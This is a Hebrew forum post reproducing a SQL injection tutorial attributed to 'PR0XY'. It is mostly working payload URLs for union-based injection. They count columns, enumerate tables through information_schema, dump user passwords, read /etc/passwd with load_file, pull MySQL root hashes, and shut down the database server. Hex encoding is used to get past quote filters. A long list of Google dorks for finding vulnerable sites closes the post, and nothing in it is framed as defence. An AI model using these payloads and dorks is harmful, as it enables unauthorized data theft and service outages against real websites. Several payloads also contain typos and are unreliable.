היי ,
את המדריך שלהלן אני לא כתבתי , אלה PR0XY ..
קודם כל לפני שאנחנו מנסים לשלוף את הנתונים אנחנו צריכים לבדוק כמה תורים יש בטבלה ואת זה נעשה ע"י שימוש בפונקציה group by, נגיד וכתובת האתר שלנו היא כזאת
קוד:
site.com/index.php?id=1
אז הכתובת שלנו תראה כך :
קוד:
site.com/index.php?id=1 group by 99
הסיבה שבתור התחלה בחרתי במספר 99 כי רוב הסיכויים שאין מספר כל כך גדול של תורים בטבלה ולכן נקבל את שגיאה הדומה לזאת :
קוד:
Unknown column '99' in 'group statement'
ברגע שאנו מקבלים את השגיאה סימן שאנחנו יכולים להתקדם מפה ואת המספר 99 נחליף במספר העמודות שלנו ע"י מעבר מספר מספר ולראות מתי יש שגיאה, לדוגמא ניסתי את כל האפשרויות האלו :
קוד:
site.com/index.php?id=1 group by 1
site.com/index.php?id=1 group by 2
site.com/index.php?id=1 group by 3
site.com/index.php?id=1 group by 4
site.com/index.php?id=1 group by 5
site.com/index.php?id=1 group by 6
וב group by 6 התקבלה שגיאה הדומה לשגיאה הקודמת:
קוד:
Unknown column '6 in 'group statement'
אני אישית לא ממליץ לעבור באמת על כל אחד מהמספרים אלא לצמצם את זה לטווח הגיוני לדוגמא אני באתר שאין בו הרבה תוכן ולכן המספר הגיוני המקסימלי שיהיה הוא 15 תורים ולכן בתור התחלה אני אנסה
קוד:
index.php?id=1 group by 15
ואז אני יקבל שגיאה וידע שמספר התורים הוא קטן יותר ולכן ננסה 10 ושוב אני עדיין יקבל שגיאה והפעם ננסה 5 ולא נקבל שגיאה, ככה שאנחנו מקבלים תחום כללי בין 5-10 תורים בטבלה ויותר קל לאתר את המספר התורים או שפשוט אפשר לחסוך את זה ולכתוב איזה סקריפט קטן שימצא את מספר התורים במקמינו
זאת אומרת שמספר הטורים בטבלה הוא 5 וכרגע נקבע אנחנו את הערך שיוצג במקום ע"י union select
קוד:
index.php?id=-1 union select 1,2,3,4,5
כרגע אם תנסו על אתר עם הזרקה אמיתית תראו שאת התוכן של העמוד החליפו המספרים אותם בחרנו וכל מה שנשאר לנו הוא לבחור מקום להצגת הפרטים.
*הערה: באתרים מסויימים יכול להיות שחסמו תווים כמו %20 בשורת הכתובת או חסמו את צירוף המילים union select ולכן נכתוב זאת כך
קוד:
index.php?id=-1+union+all+select+1,2,3,4,5
עכשיו אחרי שבחרנו מקום נוח להצגת הפרטים בתור התחלה נשלוף את הטבלאות במסד ע"י הוצאת הנתונים ממסד הנקרא information_schema שבו נשמרים שמות הטבלאות והעמודות הקיימים במסד שלכם. במדריך זה אני לא יכנס לאפשרות שהטבלה הזאת לא קיימת.
שמות הטבלאות נמצאת בטבלה ששמה tables במסד information_schema ולכן נוציא את הנתונים כך
קוד:
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables
ברגע שנכתוב הזרקה זאת בכתובת נקבל את שם הטבלה הראשונה במסד לרוב CHARACTER_SETS שזאת טבלה שלא קשורה לאתר כמו 10 אחריה בערך עכשיו אנחנו לא רוצים לקבל רק את הטבלה הראשונה ולכן נשתמש ב LIMIT כדי לקבוע מאיזה תור אנחנו רוצים לשלוף את המידע לדוגמא:
קוד:
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 1,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 2,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 3,1
עד שנמצא את הטבלה שאנחנו מחפשים, יש דרך נוספת והיא בעצם תהיה דרך קיצור בשבלנו וקוראים לה group_concat בעזרת פונקציה זו נוכל לשלוף את כל הטבלאות הקיימות במסד בפעם אחת ולקבוע כיצד תראה התצוגה לדוגמא
קוד:
index.php?id=-1+union+all+select+1,2,group_concat(table_name),4,5+from+information_schema.tabl es
שאילתא זו תשלוף לנו את כל הטבלאות מהמסד בהפרדת פסיק האחת מהשנייה לדוגמא
קוד:
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_P RIVILEGES
אפשר להסתפק בתצוגה כזאת אבל אנחנו אנשים עם סגנון ונרצה שזה יוצג לנו בצורה נוחה ולכן נשתמש באפשרות המיוחדת של group_concat והיא שילוב של כמה ערכים ביחד לדוגמא נרצה שאחרי כל טבלה תהיה ירידת שורה והטבלאות יוצגו לנו ברשימה אז פשוט נחבר את התצוגה של table_name עם התגית br של HTML אבל קודם כל נמיר את התגית להקסה וזה יראה כך :
קוד:
0x3c62723e = <br>
ונשלב את זה בתוך השאילתא שלנו כך :
קוד:
index.php?id=-1+union+all+select+1,2,group_concat(table_name, 0x3c62723e),4,5+from+information_schema.tables
מהשימוש בשאילתא זו נקבל תצוגה יותר נוחה של הטבלאות וזה יראה בערך כך :
קוד:
CHARACTER_SETS
,COLLATIONS
,COLLATION_CHARACTER_SET_APPLICABILITY
,COLUMNS
,COLUMN_PRIVILEGES
כמו כן אפשר לעשות איזה שימוש שנרצה בפונקציה על מנת להכניס איזה ערך שנרצה אפילו XSS אם באלכם.
עכשיו יש לנו את הטבלאות במסד ולמדנו כיצד לשלב hex בשאילתות שלנו והשלב הבא שנשאר הוא מציאת התורים בטבלה שמעניינת אותנו. בשביל הדוגמא נגיד שקוראים לטבלה users
קוד:
index.php?id=-1+union+all+select+1,2,column_name,4,5+from+information_schema.columns+where+tab le_name='users'
+מה חדש פה?
כמו שאתם רואים כתבנו פה שאילתא פשוטה שבעצם שולפת את התור column_name מהטבלה colums במסד information_schema בכל העמודות שבהן table_name שווה ל users ושוב נקבל את התוצאה הראשונה ולכן נשתמש ב LIMIT על מנת לקבוע איזו תוצאה אנחנו רוצים לקבל, לדוגמא:
קוד:
index.php?id=-1+union+all+select+1,2,column_name,4,5+from+information_schema.columns+where+tab le_name='users' limit 1,1
index.php?id=-1+union+all+select+1,2,column_name,4,5+from+information_schema.columns+where+tab le_name='users' limit 2,1
index.php?id=-1+union+all+select+1,2,column_name,4,5+from+information_schema.columns+where+tab le_name='users' limit 3,1
אם קבלתם שגיאה עוד בניסיון הראשון לשלוף את שם הטבלאות זה סימן ש magic quotes דלוק ולכן כל פעם שנתמש באחד מהתווים " או ' יתוופס אוטמטית / לפניהם, ולכן נחזור להתחלה והפעם בלי קיצורי דרך נמצא את המספר שעל ידיו מתקבל שם הטבלה בה אנחנו מעוניינים לדוגמא הטבלה חיפשנו את הטבלה users
קוד:
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 1,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 2,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 3,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 4,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 5,1
index.php?id=-1+union+all+select+1,2,table_name,4,5+from+information_schema.tables limit 6,1
גילנו שברגע שהגדרנו limit 6 מתקבלת הטבלה users(דבר שבמציאות לא הגיוני כי לרוב 10-12 הטבלאות הראשונות הן טבלאות מערכת)
לאחר שמצאנו את מספר העמודה של הטבלה בה אנחנו מעוניינים נשלוף את התוכן שלה כך :
קוד:
index.php?id=-1+union+all+select+1,2,column_name,4,5+from+information_schema.columns+where+tab le_name=(select+table_name+from+information.tables+limit+6,1)
מה שעשיתי פה הוא לספק לשאילתא את שם הטבלה בה אנחנו מעוניינים ע"י שליפת שם הטבלה מהמסד ובכך אני נמנע משימוש באחד מהתווים ' או " ושוב מה שנשאר לנו זה לשחק עם ה LIMIT עד שנשלוף את כל התורים מהטבלה אבל כמו שכבר אמרתי אנחנו עצלנים ולכן נעשה את זה ע"י שימוש בפונקציה group_concat רק שהפעם זה יראה כך
קוד:
union+all+select+1,2,group_concat(column_name,0x3c62723e),4,5+from+information_s chema.columns+where+table_name=(select+table_name+from+information.tables+limit+ 6,1)
שאילתא זו תתן לנו את כל התורים בטבלה בה אנחנו מעוניינים במקרה שלנו קוראים לטבלה users ומצאנו שהיא ממוקמת השישית בטבלה tables הנמצאת במסד informtaion_schema תוצאה שתמשמש דוגמא לתוכן שמתקבל מהשאילתא תהיה קצת בעייתית כי זה תלוי ביוצר הטבלה במסד אבל אני מאמין שזה יראה בערך ככה
קוד:
id
,user_name
,password
,email
כמובן שזה לא חייב להיות ככה וזאת רק הערכה שלי עכשיו כל מה שנשאר לנו הוא לשלוף את המשתמשים מהטבלה ונעשה זאת ע"י שאילתא פשוטה
קוד:
index.php?id=-1+union+all+select+1,2,password,4,5+from+users+where+id=1
באותה מידה יכלתי לכתוב
קוד:
index.php?id=-1+union+all+select+1,2,password,4,5+from+users+limit+1,1
וכל מה שנשאר הוא לשחק עם ה LIMIT ולשוף את כל הטבלה אבל יש מקרים שבהם נקבל שגיאה כמו זאת:
קוד:
Illegal mix of collations
ולכן נשתמש בפונקציות unhex ו hex על מנת לעקוף זאת ונעשה זאת כך :
קוד:
index.php?id=-1+union+all+select+1,2,unhex(hex(password)),4,5+from+users+limit+1,1
כרגע אני מאמין שלא תקבלו שגיאה ובתוכן שנלשף תקבלו את הסיסמא של המשתמש הראשון אבל כמו שכבר אמרנו אנחנו עצלנים ולא אוהבים להתעסק עם יותר מידי עם שאילתא ולכן נעשה שימוש בפונקציה group_concat ובשמות התורים ששלפנו מקודם וזה יראה כך:
קוד:
index.php?id=-1+union+all+select+1,2,group_concat(unhex(user_name),0x3a,unhex(hex(password),0x 3c62723e)4,5+from+users+limit+1,1
מה שנקבל זה את כל המשתמשים בטבלה באתר שאני עובד עליו עם כתיבת המדריך התוצאה שלי היא
קוד:
admin:admin
,user:user
חחחחח כמו שאתם רואים הם לא הכי דואגים לסיסמא שיהיה קשה לנחש
זהו עכשיו יש לנו את כל הנתונים שרצינו אבל אתם לא יוצאים מפה כזה מהר, קודם כל נלמד לעשות שימוש ב LOAD_FILE ,ב SHUTDOWN WITH NOWAIT ואיך לשלוף את שם המשתמש ל ROOT של ה MySql והסיסמא במקרה שהשרת לא מוגדר כמו שצריך.
קודם כל נלמד על LOAD_FILE, זאת פונקציה ב SQL שמאפשרת קבלת תוכן של קובץ שנבחר במקרה שההרשאות לא הוגדרו כמו שצריך אנחנו נקבל את תוכן הקובץ, השאילתא שלנו תראה כך
קוד:
index.php?id=-1+union+all+select+1,2,load_file('file'),3,4,5
אם קבלנו את תוכן הקובץ הרווחנו אבל אם קבלנו שגיאה המתקבלת כש magic quotes דלוק נשתמש באותו טריק שלמדנו מקודם הפעם נעשה שימוש ב LOAD_FILE על מנת לקבל את הקובץ passwd שנמצא בתיקיה etc
קוד:
index.php?id=-1+union+all+select+1,2,load_file('/etc/passwd'),3,4,5
index.php?id=-1+union+all+select+1,2,load_file(0x272f6574632f70617373776427),3,4,5
0x272f6574632f70617373776427 = '/etc/passwd'
כמו שאתם רואים שוב נמנענו מהצורך להשתמש בגרש או גרשיים
עכשיו נלמד איך אנחנו יכולים לבטל את השרות MySQL בשרת ע"י הזרקת שאילתא, ברוב המקרים זה לא יתאפשר מכיוון שההרשאות לא יאפשרו את זה אבל כמעט תמיד באיחסון הראשי בשרת עושים שימוש ב ROOT של ה MySQL בתור המשתמש שלהם ולכן אם נמצא הזרקה באתר שנמצא באיחסון הראשי הסיכויים להצליח לבטל את השרות גדולים יותר, כל מה שאנחנו צריכים זה להוסיף לכתובת שורה שאמורה לכבות את ה MySQL בשרת וזה יראה ככה :
קוד:
index.php?id=1+SHUTDOWN WITH NOWAIT;
אם השרות בוטל הצלחנו יפה ושום אתר או מערכת העושה שימוש במסד המאוחסנת בשרת לא תתפקד.
עכשיו נלמד על קבלת פרטי ה ROOT, ב MySQL בגרסה 5 יש את הטבלה mysql.user שאם לא הגדירו את ההרשאות אלייה נכון נוכל לקבל את הפרטים של ה ROOT ע"י הכנסת השאילתא :
קוד:
index.php?id=-1+union+select+1,2,password,4,5+from+mysql.user
שאילתא זו תתן לכם את הסיסמא הראשונה השמורה במסד וכמו שכבר הבנתם המשתמש הראשון הוא תמיד ה ROOT
*הערה: יכול להיות שגם הפעם תקבלו שגיאה ותצטרכו להשתמש בפונקציות unhex ו hex וגם תוכלו להשתמש בפונקציה group_concat לשליפת כל המשתמשים בצורה מסודרת או בפונקציה concat העושה בדיוק את אותה הפעולה רק שבמקום לשלוף את כל הטבלה היא רק מאחדת האת הנתונים שהוגדרו לה.
ולפני שאנחנו מסיימים דבר אחרון ששמתי לב שלא כתבתי במדריך הוא שימוש ב -- על מנת לבטל את המשך השאילתא, לדוגמא השאילתא בקוד היא כזאת :
קוד:
SELECT email FROM users WHERE id = '$_GET[id]'
מה שיקרה ברגע שנזריק הוא שההזרקה שלנו תוכנס לתוך הגרשיים ולכן נקבל שגיאה ובגלל זה נשתמש בתווים -- שאם כותבים אותם לא תהיה חשיבות לכל מה שבא אחריהם לדוגמא נרצה להזריק שאילתא על מנת למצוא את הטבלאות נעשה זאת כך :
קוד:
index.php?id=-1+union+all+select+1,2,group_concat(table_name, 0x3c62723e),4,5+from+information_schema.tables--
וככה לא תהיה חשיבות ל ' שבא אחרי השאילתא שהזרקנו =]
עד פה המדריך ולסיום הנה DORKS(לא אני כתבתי את ה DORKS האלה)
קוד:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl
ageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl
roductinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:"id=" & intext:"Warning: mysql_fetch_assoc()
inurl:"id=" & intext:"Warning: mysql_fetch_array()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: is_writable()
inurl:"id=" & intext:"Warning: getimagesize()
inurl:"id=" & intext:"Warning: Unknown()
inurl:"id=" & intext:"Warning: session_start()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: pg_exec()
inurl:"id=" & intext:"Warning: mysql_result()
inurl:"id=" & intext:"Warning: mysql_num_rows()
inurl:"id=" & intext:"Warning: mysql_query()
inurl:"id=" & intext:"Warning: array_merge()
inurl:"id=" & intext:"Warning: preg_match()
inurl:"id=" & intext:"Warning: ilesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: filesize()
inurl:"id=" & intext:"Warning: require()
אני לא מאמין שכרגע בפורום יש מדריך יותר מפורט וסוקר יותר נושאים מזה, הצעות והערות יתקבלו בברכה.
Pr0xY
אם אפשר שתשימו את זה בדביק השקעתי פה איזה שעה וחצי של כתיבה
מדריך SQL INJECTION של pr0xy !
ציטוט ההודעה
נכתב במקור על ידי SQL Injection
